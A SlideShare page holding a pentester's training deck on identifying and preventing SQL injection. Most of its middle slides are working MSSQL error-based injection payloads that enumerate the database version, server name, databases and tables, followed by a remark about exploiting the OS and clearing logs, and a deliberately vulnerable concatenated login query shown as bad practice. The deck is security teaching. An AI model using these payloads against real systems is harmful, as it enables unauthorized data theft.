SlideShare a Scribd company logo

How to identify and prevent SQL injection

Eguardian Global Services
Eguardian Global Services

• What is SQL injection ? • Why is it harmful? • Types of SQL injection attacks. • How to identify SQL injection vulnerability. • Exploiting SQL injection. • How to protect Web Application from SQL injection.

Technology
1 of 47
How to Identify and Prevent SQL Injection
#Whoami Janith Malinga Security Consultant @egscyber Web Pentester for 4 years Enthusiastic traveler Community teacher over for 6 years Twitter : @janithSmalinga linkedIn : https://www.linkedin.com/in/malingajanith/ Github : https://github.com/janithmalinga Phone : 0769803462
Why web applications need security • Behind most applications lies sensitive data • Easy to access • Anybody can access from anywhere • Hard to trace back • Lot of tools available to hack a web site (sql map, BEEF)
Web Application Vulnerabilities OWASP Top 10 Application Security Risks 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
SQL Injection (SQLi)
What is SQLi SQLi is a vulnerability that results in letting an attacker influence SQL queries that an application passes to the backend of a database
Well known SQLi Attacks • Lenovo (2019) 1+ million users compromised • Texas.gov and Florida.gov (2018) state databases of contractors and employees leaked. • Shamshabad engineering college incident (2018) Students hack the system and changed their results • Mossack Fonseca (Panama Papers) (2016) The famous panama paper incident by wikileaks.
Well known SQLi Attacks SQLi Malwares • Asprox • Lizamoon
Understand how web applications work Client Computer Application Server Database Server
Understand how web applications work Client Computer Application Server Database Server Request /home.php Response /home.php
Understand how web applications work Student search ID: Search https://www.abcd.com/student
Understand how web applications work Student search 123ID: Search https://www.abcd.com/student?id=123
Understand how web applications work Student search 123ID: Search https://www.abcd.com/student ID 123 Name Bob Age 18 Class Maths
Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=123 Response /student.php id=123&name=Bob&a ge=18&class=Maths What’s happening under the hood??? Select * from students where id=123 123 Bob 18 Maths
Understanding SQLi Recall: what is SQLi? SQLi is a vulnerability that results when you gives an attacker the ability to influence the SQL queries that an application passes to a backend database.
Understanding SQLi Now let’s manipulate the input so that the database will be confused ☺
Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ The user input is only ‘ character
Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=‘ Response /student.php Error: What the heck are you searching??? What’s happening under the hood??? Select * from students where id=‘ Error: What the heck are you searching???
Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ Error: What the heck are you searching???
MySQL error
MSSQL error
Understanding SQLi DEMO
What SQLi can do • Extract data • Add or modify data • Perform DOS attack • Bypass authentication • Executing remote commands
Sample SQL Injection Attack
Web login form First we sent the input ‘ character Member login Username: Password: Login
Output – page is vulnerable to sql injection
Payload: a’ and 1=0/@@version;-- Find database version
Payload: a' and 1=0/(select @@servername);-- Find server name
Payload: a' and 1=0/(select db_name());-- Find database name
Payload: a' and 1=0/(select top 1 name from master..sysdatabases);-- Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));-- Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));-- Find all databases
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));-- Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));-- Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));-- Find tables
Next steps • Getting all the data • Manipulating the data • Finally exploit the OS and gain access to the server and clear the logs. ☺ ☺ ☺
How to Prevent SQL Injection
Prevent SQL Injection 1. Code level prevention 2. Platform level prevention
Prevent SQL Injection Code level prevention - Use parameterized queries Bad practice username = request(“username”) password = request(“password”) sql = “SELECT * FROM users WHERE username=‘ ” + username + “ ’ AND password=‘ “ + password + “ ‘ “; result = Db.Execute(sql) If(result){/*Login success*/}
Prevent SQL Injection Good practice : Use parameterized queries username = request(“username”) password = request(“password”) string sql = “SELECT * FROM users WHERE username=? AND password=?”; preparedstatement cmd = con.preparedstatement(sql); cmd.setstring(1, username); cmd.setstring(2, password); result = cmd.executeQuery(); If(result){/*Login success*/}
Prevent SQL Injection Code level prevention - Validating input • Whitelisting • Blacklisting Data type, data size, data range, content
Prevent SQL Injection Code level prevention - Encoding output Encoding to the database sql = sql.replace(“’”, “’’”);
Prevent SQL Injection Platform level prevention - Web application firewall (WAF)
Prevent SQL Injection Platform level prevention - IPS
Prevent SQL Injection Platform level prevention – Log collection and Monitoring
Q&A !!!
How to identify and prevent SQL injection

Recommended

Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Sql injection
Sql injectionSql injection
Sql injectionSasha-Leigh Garret
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 

Recommended

Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Sql injection
Sql injectionSql injection
Sql injectionSasha-Leigh Garret
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql injections
Sql injectionsSql injections
Sql injectionsKK004
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
SQL injection
SQL injectionSQL injection
SQL injectionRaj Parmar
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Sqlmap
SqlmapSqlmap
SqlmapRushikesh Kulkarni
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 

More Related Content

What's hot

Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql injections
Sql injectionsSql injections
Sql injectionsKK004
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 

What's hot (20)

Sql injection
Sql injectionSql injection
Sql injection
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Sql injections
Sql injectionsSql injections
Sql injections
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Sqlmap
SqlmapSqlmap
Sqlmap
 

Similar to How to identify and prevent SQL injection

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
SQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop ItSQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop ItGrant Fritchey
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachJeff Prom
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenSqreen
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampFelipe Prado
 
SQL Injection Attacks - Is Your Data Secure? GroupBy Conference
SQL Injection Attacks - Is Your Data Secure? GroupBy ConferenceSQL Injection Attacks - Is Your Data Secure? GroupBy Conference
SQL Injection Attacks - Is Your Data Secure? GroupBy ConferenceBert Wagner
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen? Claranet UK
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 

Similar to How to identify and prevent SQL injection (20)

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection Exploited
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaser
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
SQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop ItSQL Injection: How It Works, How to Stop It
SQL Injection: How It Works, How to Stop It
 
SQL Injection in JAVA
SQL Injection in JAVASQL Injection in JAVA
SQL Injection in JAVA
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington Beach
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Sql security
Sql securitySql security
Sql security
 
SQL Injection Attacks - Is Your Data Secure? GroupBy Conference
SQL Injection Attacks - Is Your Data Secure? GroupBy ConferenceSQL Injection Attacks - Is Your Data Secure? GroupBy Conference
SQL Injection Attacks - Is Your Data Secure? GroupBy Conference
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen?
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 

Recently uploaded

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 

Recently uploaded (20)

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 

How to identify and prevent SQL injection

  • 1. How to Identify and Prevent SQL Injection
  • 2. #Whoami Janith Malinga Security Consultant @egscyber Web Pentester for 4 years Enthusiastic traveler Community teacher over for 6 years Twitter : @janithSmalinga linkedIn : https://www.linkedin.com/in/malingajanith/ Github : https://github.com/janithmalinga Phone : 0769803462
  • 3. Why web applications need security • Behind most applications lies sensitive data • Easy to access • Anybody can access from anywhere • Hard to trace back • Lot of tools available to hack a web site (sql map, BEEF)
  • 4. Web Application Vulnerabilities OWASP Top 10 Application Security Risks 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
  • 6. What is SQLi SQLi is a vulnerability that results in letting an attacker influence SQL queries that an application passes to the backend of a database
  • 7. Well known SQLi Attacks • Lenovo (2019) 1+ million users compromised • Texas.gov and Florida.gov (2018) state databases of contractors and employees leaked. • Shamshabad engineering college incident (2018) Students hack the system and changed their results • Mossack Fonseca (Panama Papers) (2016) The famous panama paper incident by wikileaks.
  • 8. Well known SQLi Attacks SQLi Malwares • Asprox • Lizamoon
  • 9. Understand how web applications work Client Computer Application Server Database Server
  • 10. Understand how web applications work Client Computer Application Server Database Server Request /home.php Response /home.php
  • 11. Understand how web applications work Student search ID: Search https://www.abcd.com/student
  • 12. Understand how web applications work Student search 123ID: Search https://www.abcd.com/student?id=123
  • 13. Understand how web applications work Student search 123ID: Search https://www.abcd.com/student ID 123 Name Bob Age 18 Class Maths
  • 14. Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=123 Response /student.php id=123&name=Bob&a ge=18&class=Maths What’s happening under the hood??? Select * from students where id=123 123 Bob 18 Maths
  • 15. Understanding SQLi Recall: what is SQLi? SQLi is a vulnerability that results when you gives an attacker the ability to influence the SQL queries that an application passes to a backend database.
  • 16. Understanding SQLi Now let’s manipulate the input so that the database will be confused ☺
  • 17. Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ The user input is only ‘ character
  • 18. Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=‘ Response /student.php Error: What the heck are you searching??? What’s happening under the hood??? Select * from students where id=‘ Error: What the heck are you searching???
  • 19. Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ Error: What the heck are you searching???
  • 23. What SQLi can do • Extract data • Add or modify data • Perform DOS attack • Bypass authentication • Executing remote commands
  • 25. Web login form First we sent the input ‘ character Member login Username: Password: Login
  • 26. Output – page is vulnerable to sql injection
  • 27. Payload: a’ and 1=0/@@version;-- Find database version
  • 28. Payload: a' and 1=0/(select @@servername);-- Find server name
  • 29. Payload: a' and 1=0/(select db_name());-- Find database name
  • 30. Payload: a' and 1=0/(select top 1 name from master..sysdatabases);-- Find all databases
  • 31. Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));-- Find all databases
  • 32. Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));-- Find all databases
  • 33. Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));-- Find tables
  • 34. Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));-- Find tables
  • 35. Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));-- Find tables
  • 36. Next steps • Getting all the data • Manipulating the data • Finally exploit the OS and gain access to the server and clear the logs. ☺ ☺ ☺
  • 37. How to Prevent SQL Injection
  • 38. Prevent SQL Injection 1. Code level prevention 2. Platform level prevention
  • 39. Prevent SQL Injection Code level prevention - Use parameterized queries Bad practice username = request(“username”) password = request(“password”) sql = “SELECT * FROM users WHERE username=‘ ” + username + “ ’ AND password=‘ “ + password + “ ‘ “; result = Db.Execute(sql) If(result){/*Login success*/}
  • 40. Prevent SQL Injection Good practice : Use parameterized queries username = request(“username”) password = request(“password”) string sql = “SELECT * FROM users WHERE username=? AND password=?”; preparedstatement cmd = con.preparedstatement(sql); cmd.setstring(1, username); cmd.setstring(2, password); result = cmd.executeQuery(); If(result){/*Login success*/}
